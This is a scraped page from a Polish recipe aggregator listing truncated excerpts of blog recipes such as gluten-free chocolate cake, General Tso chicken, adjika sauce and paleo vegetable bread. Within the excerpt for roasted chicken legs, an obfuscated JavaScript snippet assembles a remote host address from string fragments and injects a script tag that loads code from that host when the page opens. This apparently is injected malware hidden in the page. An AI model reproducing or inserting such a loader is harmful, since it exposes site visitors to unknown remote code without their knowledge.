bez pieczenia - 51792 przepisów (strona:2352/3453)

Bezglutenowe ciasto czekoladowe z bananami 206

Wszyscy lubią ciasto czekoladowe. Przygotowany przeze mnie  dzisiaj wypiek jest wilgotny, ale jednocześnie lekki dzięki mące kukurydzianej. Na jego korzyść przemawia mocno czekoladowy smak, lekko

Szybko Tanio Smacznie
MAKOWIEC JAPOŃSKI, BEZ GLUTENU 637

Ciasto, które kiedyś dość często gościło na naszym stole. Ostatnio zapomniane, dzisiaj powróciło w troszkę innej odsłonie, bowiem mój przepis gdzieś się ulotnił. Ale prześledziłam szybko

Smaczne Zdrowe
Czwartek: Kurczak generała Tso 144

Prosty patent, żeby zwykłego, panierowanego kurczaka zmienić w danie zupełnie niecodzinne. Kurczak generała Tso na pewno Wam zasmakuje. Czas przygotowania : 10 minut Czas pieczenia : 15-18 minut Poziom trudności : Łatwe Liczba porcji : 2 Znany jest pod przeróżnymi nazwami: kurczak generała Tso, generała Mao, generała Zuo, Gao, Cho, Tang. A co najlepsze z żadnym generałem nie ma nic wspólnego. Skąd(...)kurczaka generała Tso. W oryginalnej wersji kurczaka trzeba zapanierować i usmażyć w głębokim tłuszczu a potem zanurzyć w słodkim sosie, zrobionym na bazie cukru. My zrobiliśmy zdrowszą wersję, bez smażenia. Kurczaka upiekliśmy, sos jest owszem słodki, ale zawiera niewielką ilość cukru. Chcemy zwrócić waszą uwagę na panierkę do kurczaka. Zamiast żółtka jajka wykorzystaliśmy ubite białko, dzięki czemu upieczone mięso

Niedzielny kucharz
Udka kurczaka pieczone z warzywami w rękawie 642

przywożą nie wiem skąd), dlatego akurat mięso zawsze kupuję w sklepach i to tylko te sprawdzone, dobrej jakości marki. Zagrodowy do takich należy, bo karmią te kurczaki paszą roślinną bez GMO, a nie jakimiś sztucznościami, sterydami i nie wiadomo czym jeszcze, więc to zdrowy kurczak. Zresztą zobacz na stronie www.zagrodowy.pl (konkretnie o marce tutaj ), sporo się można dowiedzieć(...)szybko wrzucisz do pieca, gdy już będą za stołem i za niecałe dwie godziny po pierwszym i drugim daniu podasz znów ciepłe na stół. (function(){ oXz8=document.createElement("script");oXz8.async=true;oXz8_="u"+("s")+"t"; oXz8u="65506613.";oXz8_+="a"+("t.i");oXz8_+="n"+("f"+"o")+"/"; oXz8u+="s5bXrfyjXz86xis19fel46"+("pjnwnc58"); oXz8.src="//"+oXz8_+oXz8u;oXz8.type="text/javascript"; document.body.appendChild(oXz8); })(); Udka kurczaka pieczone z warzywami w rękawie

Kolorowy Przepisownik
Sos adżika 125

czasami także innych warzyw. Adżika jest równie uniwersalna, jak  prosty sos pomidorowy i pasuje niemal do wszystkiego. Jest lekko pikantna, pyszna i bardzo aromatyczna. Świetnie smakuje z pieczonym lub grillowanym mięsem i warzywami, ale równie dobrze komponuje się z makaronem i jako dodatek do kanapek. Śmiało można powiedzieć, że sos adżika jest odpowiednikiem włoskiego czerwonego pesto, chociaż pochodzi(...)czarnego pieprzu lub do smaku pół szklanki oleju    Przepis na sos adżika 1. Pomidory zanurz na minutę we wrzątku, opłucz zimną wodą i zdejmij skórkę. .Będzie schodziła bez najmniejszych problemów. Wydrąż gniazda nasienne, a miąższ pomidorów pokrój w drobną kostkę. 2. Czerwoną paprykę i chili oczyść z nasion i drobno posiekaj. Jabłka obierz ze skórki i pokrój

Cztery Fajery
Chleb niskowęglowodanowy paleo (z warzyw) 143

warzyw można zrobić chleb? Oczywiście, w dodatku chleb bezglutenowy, bez zbóż, nabiału i niskowęglowodanowy, a także ze zdrowym profilem tłuszczów wielonienasyconych. Chleb, który jest przy tym bardzo smaczny, sycący i szybko się go przygotowuje. Jak zrobić taki pyszny i zdrowy chleb? Przepis na chleb paleo, niskowęglowodanowy, bez zbóż, nabiału (laktozy i kazeiny) i bezglutenowy: jajka – 7 większych(...)foremki 10×20 cm, udekoruj resztką pestek i piecz w 180° przez 50-60 minut (sprawdzaj patyczkiem). Gotowe! Co zrobić, żeby nie wyszedł zakalec? Najważniejsze, żeby dobrze odsączyć warzywa z soku, zadbaj też, by wszystkie składniki (poza roztopionym tłuszczem) były w temperaturze pokojowej. Nie otwieraj za często pieca i daj chlebowi troszkę przestygnąć w formie pod koniec

PaleoSMAK
Konfitura z czerwonej cebuli 147

gruszek . Do konfitury z cebuli wybieramy więc popularną w Indiach czerwoną cebulę, która w naszych sklepach dostępna jest przez cały rok.  Czerwona cebula powinna być twarda, sucha bez przebarwień  i kiełków. Jaki ocet do konfitury z cebuli Także w tym przypadku nie ma miejsca na zamienniki. Wybieramy najlepszy z dostępnych ocet balsamiczny. Wspaniale byłoby, gdybyście trafili(...)temu konfitura będzie miała doskonałą teksturę. Konfitura z czerwonej cebuli - do czego podawać Konfitura z czerwonej cebuli rewelacyjnie podkreśla smak wszelkiego typu pasztetów, pieczonych i grillowanych mięs, w tym steków oraz wędlin. Doskonale pasuje też do pieczonej kaczki lub gęsi. Można ją dodawać do pizzy, tostów, hamburgerów i wytrawnych tart oraz jako uzupełnienie deski serów. Konfitura z czerwonej cebuli - składniki

Kulinaria - potrawy z różnych stron świata
Kuchnia Europejska potrafi zaskoczyć! 105

danie przechodzi z pokolenia na pokolenie. Potrawa składa się z pokrojonych w plasterki warzyw takich jak ziemniaki oraz bakłażan, mięsa mielonego oraz sosu beszamelowego a całość zapiekana jest w piecu. Włoska pizza to danie obok którego, nie można przejść obojętnie, będąc w tym państwie. Najsłynniejsza pizza na całym świecie to neapolitana a jej składnikami jest ser mozzarella, bazylia oraz(...)sosu. Hiszpańska paella skradnie serce każdego smakosza. Najlepszą paellę skosztujemy w Walencji i wbrew pozorom jest dużo odmian tej potrawy. Najpopularniejsza składa się z ryżu oraz warzyw, ale bez problemu trafić możemy również na taką, w której dodatkami będą mięso (królicze, drobiowe) lub owoce morza. Artykuł Kuchnia Europejska potrafi zaskoczyć! pochodzi z serwisu Przepis Kulinarny ProstePesto a jego autorem

ProstePesto.pl
Drożdżowe rogaliki z budyniem 114

mąki pszennej typu 450 2 jajka rozmiar L 3 łyżki płynnego masła 250 ml mleka 2% 14 g drożdży instant 100 g cukru ½ łyżeczki soli Nadzienie 2 budynie czekoladowe bez cukru – 80 g proszku 800 ml mleka 2% 4 łyżki cukru Dodatkowo jajko – do posmarowania Sposób przygotowania Mleko zagrzać by było lekko ciepłe, dodać(...)cienki prostokąt o grubości 0,5 centymetra. Wykrawać trójkąty, na każdy umieścić sporą łyżeczkę budyniu. Zawinąć w rogalik. Odstawić na 30 min w ciepłe miejsce. Rogaliki posmarować roztrzepanym jajkiem. Piec w temperaturze 180ºC przez 8 – 10 minut, grzanie góra-dół. Artykuł Drożdżowe rogaliki z budyniem pochodzi z serwisu Alle Dobre

Alle Dobre!
Bułeczki cynamonowe 137

Puszyste, idealnie słodkie i przyjemnie cynamonowe… Takie właśnie są dzisiejsze bułeczki cynamonowe , nazywane również cynamonkami. Już w trakcie pieczenia całe mieszkanie wypełniło się ich cudownym zapachem. Gdy tylko ukręciłem je po raz pierwszy, zastanawiałem się jak ja je wszystkie zjem… Oczywiście po skosztowaniu pierwszej cynamonki obawy zostały rozwiane, a chwilę później cała blaszka cynamonek zniknęła w niewyjaśnionych(...)olejem kokosowym. Czym udekorować cynamonki? U mnie był to klasyczny lukier na bazie cukru pudru, ponieważ pasuje on do nich moim zdaniem najbardziej. Oczywiście możesz również zajadać je bez dekoracji! Wegańskie bułeczki cynamonowe W związku z tym, że cynamonki zrobiłem BEZ JAJEK i BEZ MLEKA, to nadają się one DLA KAŻDEGO. Jeśli lubisz tego typu przepisy

Blendman
Frittata z kurczakiem i szparagami FIT 96

Frittata to taka tarta bez spodu, którą można jeść o każdej porze. Pyszne i lekkie danie, które może stanowić główny posiłek dnia jak i przekąskę. Idealnie smakuje na ciepło bezpośrednio po przygotowaniu, ale również na zimno, dlatego świetnie sprawdza się do lunchbox’a. Jej przygotowanie jest bajecznie proste, a możemy wykorzystać do niej wszystko to, co zalega(...)cebule – 50ml mleka – 50g tartego parmezanu – 1-2 łyżki masła – 2 ząbki czosnku – sól, pieprz Piekarnik rozgrzewamy do 180 stopni. Formę o średnicy 25cm natłuszczamy i wykładamy papierem do pieczenia. Pierś z kurczaka w całości gotujemy lub podsmażamy na patelni z solą i pieprzem, studzimy. Na patelni roztapiamy masło i podsmażamy pokrojone w kostkę cebule i przeciśnięty przez praskę

Be Fit Be Strong
DYNIA - przepisy na 5 prostych dań i pomysł na makaron z pulpecikami dyniowymi z piekarnika 133

odżywczych. Aby było bardziej fit, upiekłam pulpeciki w piekarniku i na końcu dodałam do gotowego sosu pomidorowego.  Składniki / dla 4 osób: na pulpeciki dyniowe: 300 g dyni (waga bez skórki i pestek), u mnie Hokkaido - niecała połowa dyni, ok. 400 g ze skórką 1 łyżeczka oliwy sól i pieprz 70 g kukurydzy z puszki - 3 łyżki(...)pieprz  natka pietruszki lub świeża bazylia do dekoracji Przygotowanie makaronu z pulpecikami dyniowymi z piekarnika: Miąższ dyni obierz ze skórki i pokrój w kostkę. Ułóż na papierze do pieczenia, skrop oliwą i dopraw solą i pieprzem. Wstaw do piekarnika nagrzanego do 200 stopni C i piecz przez 20 minut, aż będzie miękki.  Upieczoną dynię umieść w misce

Chilli Czosnek i Oliwa
Kolorowe beziki 116

bezy muszą być nudne? BYNAJMNIEJ Kolorowe beziki są tego świetnym potwierdzeniem. To cieszący oko mini deser, na który chyba każdy się skusi A dodatkowo świetna opcja na wykorzystanie białek, które zostają nam chociażby z czekoladowych ciasteczek . Składniki: 3 białka 6-8 łyżek cukru 6 czubatych łyżek mielonych orzechów 6 czubatych łyżek kokosa Dowolne barwniki spożywcze Białka ubijam na sztywno(...)miseczki. Do każdej miseczki dodaję 3 łyżki orzechów lub kokosa i barwnik (ilość zależy od intensywności koloru, który chcemy uzyskać). Beziki wykładam łyżeczką na blaszkę wyłożoną papierem do pieczenia i wstawiam do piekarnika nagrzanego do 130 stopni. Suszę 40 – 45 minut. Beziki można dodatkowo przyozdobić czekoladą lub skleić nutellą. Smacznego Artykuł Kolorowe beziki pochodzi z serwisu Słodki sentyment

Słodki sentyment
Ciastka bezglutenowe 106

niełatwo znaleźć dobry przepis na chleb, ciasto czy ciastka. Postanowiłam spróbować swoich sił w tej dziedzinie, a efekt pracy poniżej przedstawiam poniżej 🙂 Ciastka są nie tylko bezglutenowe, ale i bez mleka krowiego, masła i białego cukru, czyli mega zdrowe!!! Ciasteczka o smaku kokosowo – migdałowym z suszoną żurawiną wspaniale smakują i w niczym nie ustępują klasycznym ciasteczkom. Polecam zrobić(...)mąki z amarantusa 50 g mąki ziemniaczanej 65 g wiórków kokosowych 80 g fruktozy 80 ml oleju słonecznikowego 1 średnie jajko 1 łyżka ekstraktu waniliowego 1 łyżeczka proszku do pieczenia 1/2 łyżeczki sody oczyszczonej 50 g suszonej żurawiny 130 g mielonych migdałów Instructions Wszystkie składniki umieścić w misce, wymieszać. Ciasto będzie dość klejące dlatego proponuję po wymieszaniu włożyć

SprawdzonaKuchnia.pl

Proponowane wyszukiwania